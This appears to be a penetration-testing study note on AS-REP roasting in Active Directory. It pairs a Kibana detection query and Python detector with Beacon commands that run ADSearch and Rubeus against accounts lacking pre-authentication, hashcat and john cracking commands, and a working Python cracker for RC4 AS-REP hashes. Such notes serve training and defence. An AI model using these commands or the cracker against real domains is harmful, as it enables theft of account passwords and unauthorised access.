AS-REP roasting is an attack on Kerberos that recovers a user's password by cracking an AS-REP offline. Part of the AS-REP (the enc-part carrying the session key) is encrypted under a key derived from the user's password, so anyone holding an AS-REP for that user can brute-force it. Normally the KDC only issues an AS-REP after pre-authentication, i.e. after the client proves knowledge of the password with an encrypted timestamp, so directly requesting an AS-REP for an arbitrary account requires that account to have pre-authentication disabled (DONT_REQ_PREAUTH). The AS-REP is then roasted like a TGS-REP in Kerberoasting to obtain the user's plaintext password.

OPSEC warning

AS-REP roasting generates a 4768 event (A Kerberos authentication ticket (TGT) was requested) on the DC, with Ticket Encryption Type 0x17 (RC4-HMAC) and Pre-Authentication Type 0 (logon without pre-authentication).

Kibana: event.code: 4768 and winlog.event_data.PreAuthType: 0 and winlog.event_data.TicketEncryptionType: 0x17
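The same detection logic as the Kibana query, written as Python and run over constructed 4768 events. This is an added example, not part of the original notes or of any Elastic content; the event layout mirrors Winlogbeat's Security channel mapping (event.code, winlog.event_data.*), and the IPs and account names are invented.

```python
"""Added example: the Kibana query for AS-REP roasting as Python over constructed 4768 events."""
from collections import defaultdict


def event_4768(user, ip, preauth, etype, code="4768"):
    """Build one constructed event in the Winlogbeat layout (helper for the sample data)."""
    return {
        "event": {"code": code},
        "winlog": {"event_data": {
            "TargetUserName": user,
            "IpAddress": ip,
            "PreAuthType": preauth,          # "2" = encrypted timestamp, "0" = no pre-auth
            "TicketEncryptionType": etype,   # "0x12" = AES256, "0x17" = RC4-HMAC
        }},
    }


# Constructed sample events (made-up hosts and accounts).
SAMPLE_EVENTS = [
    event_4768("jdoe", "::ffff:10.10.1.20", "2", "0x12"),        # normal AES logon, pre-auth done
    event_4768("svc_backup", "::ffff:10.10.5.7", "0", "0x17"),  # roast: no pre-auth, RC4 AS-REP
    event_4768("svc_sql", "::ffff:10.10.5.7", "0", "0x17"),     # same source roasting a second account
    event_4768("legacyapp", "::ffff:10.10.1.30", "2", "0x17"),  # RC4 but pre-authenticated: not a roast
    event_4768("svc_backup", "::ffff:10.10.5.7", "0", "0x17", code="4769"),  # wrong event id, ignored
]


def is_asrep_roast(event):
    """event.code: 4768 and PreAuthType: 0 and TicketEncryptionType: 0x17, exactly as the Kibana query."""
    if event.get("event", {}).get("code") != "4768":
        return False
    data = event.get("winlog", {}).get("event_data", {})
    return data.get("PreAuthType") == "0" and data.get("TicketEncryptionType") == "0x17"


def roasted_accounts_by_source(events):
    """Group matches by requesting IP. One source pulling AS-REPs for several accounts is the
    pattern a wide Rubeus run (no /user) leaves and is a stronger signal than a single hit."""
    hits = defaultdict(set)
    for event in events:
        if is_asrep_roast(event):
            data = event["winlog"]["event_data"]
            hits[data["IpAddress"]].add(data["TargetUserName"])
    return {ip: sorted(users) for ip, users in hits.items()}


if __name__ == "__main__":
    for ip, users in roasted_accounts_by_source(SAMPLE_EVENTS).items():
        print(f"{ip} requested pre-auth-less RC4 AS-REPs for: {', '.join(users)}")
```

Two caveats when tuning this: a legitimate client of an account that has pre-authentication disabled also produces PreAuthType 0, so the etype condition and the per-source grouping carry the signal; and an attacker who asks for AES instead of RC4 produces a 4768 with TicketEncryptionType 0x12 and PreAuthType 0, which the RC4-pinned query misses, so widen the etype condition if you want those too.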

To find accounts vulnerable to AS-REP roasting (i.e. with pre-authentication disabled) using ADSearch. The filter matches users whose userAccountControl has the DONT_REQ_PREAUTH bit set (0x400000 = 4194304), tested with the LDAP_MATCHING_RULE_BIT_AND rule 1.2.840.113556.1.4.803:

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname

To request an AS-REP for a specific user and print it as a crackable hash using Rubeus (omit /user to roast every account that has pre-authentication disabled; /nowrap keeps the hash on a single line so it can be copied cleanly):

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:[username] /nowrap

To crack the hash offline. Rubeus writes the john format unless /format:hashcat is given; hashcat mode 18200 expects the $krb5asrep$23$user@DOMAIN:... form, so either use that flag or insert the "23$" etype marker by hand.

  • hashcat: hashcat -a 0 -m 18200 [hashfile] [wordlist]
  • john: john --format=krb5asrep --wordlist=[wordlist] [hashfile]
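What the two crackers actually compute for an etype 23 hash, as an added example in pure Python (not code from the original notes, Rubeus, hashcat or john). It builds a constructed $krb5asrep$23$ line from a known password and cracks it against a small wordlist. The account name, domain, password, wordlist, confounder and the fake EncASRepPart body are invented; the RC4-HMAC steps follow RFC 4757 with key usage 8, which is the value Windows KDCs use for the AS-REP enc-part and the one hashcat mode 18200 assumes.

```python
"""Added example: the check behind hashcat -m 18200 / john krb5asrep for an RC4-HMAC AS-REP."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
KEY_USAGE_ASREP = 8  # what hashcat 18200 derives K1 with (Windows uses 8 here, not RFC 4120's 3)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data):
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often missing on OpenSSL 3 builds."""
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(48):
            if i < 16:    # round 1: F, words in order
                f, k, s, add = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:  # round 2: G, words 0,4,8,12,1,5,...
                f, k, s, add = (b & c) | (b & d) | (c & d), (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4], 0x5A827999
            else:         # round 3: H, fixed word order
                f, k, s, add = b ^ c ^ d, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, _rotl((a + f + x[k] + add) & MASK, s), b, c
        h = [(u + v) & MASK for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password):
    """The RC4-HMAC long-term key is the NT hash: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def rc4(key, data):
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _k1(key, usage):
    """RFC 4757: K1 = HMAC-MD5(K, key usage as 4-byte little-endian)."""
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def rc4_hmac_encrypt(key, usage, plaintext):
    """RFC 4757 encryption of confounder||plaintext: edata = checksum || RC4(Ke, data)."""
    k1 = _k1(key, usage)
    checksum = hmac.new(k1, plaintext, hashlib.md5).digest()
    ke = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(ke, plaintext)


def parse_asrep_hash(line):
    """$krb5asrep$23$user@DOMAIN:<checksum hex>$<edata hex> (Rubeus /format:hashcat, hashcat 18200)."""
    head, tail = line.split(":", 1)
    checksum_hex, edata_hex = tail.split("$", 1)
    return head.split("$")[3], bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def try_password(password, checksum, edata):
    """One cracker iteration: derive Ke from the candidate and the checksum, decrypt, verify."""
    k1 = _k1(nt_hash(password), KEY_USAGE_ASREP)
    plain = rc4(hmac.new(k1, checksum, hashlib.md5).digest(), edata)
    if plain[8] != 0x79:  # cheap filter: after the 8-byte confounder comes the EncASRepPart tag
        return False
    return hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum)


def crack(line, wordlist):
    _identity, checksum, edata = parse_asrep_hash(line)
    return next((pw for pw in wordlist if try_password(pw, checksum, edata)), None)


def make_sample_hash(password, user="svc_backup", domain="CORP.LOCAL"):
    """Constructed test vector: fake EncASRepPart body (only the leading 0x79 tag matters here)."""
    confounder = b"\x01\x23\x45\x67\x89\xab\xcd\xef"  # fixed instead of random so the output is reproducible
    enc_as_rep_part = b"\x79\x81\x20" + b"\x00" * 32
    edata = rc4_hmac_encrypt(nt_hash(password), KEY_USAGE_ASREP, confounder + enc_as_rep_part)
    return f"$krb5asrep$23${user}@{domain}:{edata[:16].hex()}${edata[16:].hex()}"


SAMPLE_HASH = make_sample_hash("Summer2023!")
WORDLIST = ["password", "Welcome1", "P@ssw0rd", "Summer2023!"]  # constructed wordlist

if __name__ == "__main__":
    print(SAMPLE_HASH)
    print("cracked:", crack(SAMPLE_HASH, WORDLIST))
```

The cost per candidate is one MD4, three HMAC-MD5s and an RC4 keystream, with no salt, which is why RC4 AS-REPs crack so fast on GPUs; hashcat applies the same 0x79 tag check before the full HMAC verification.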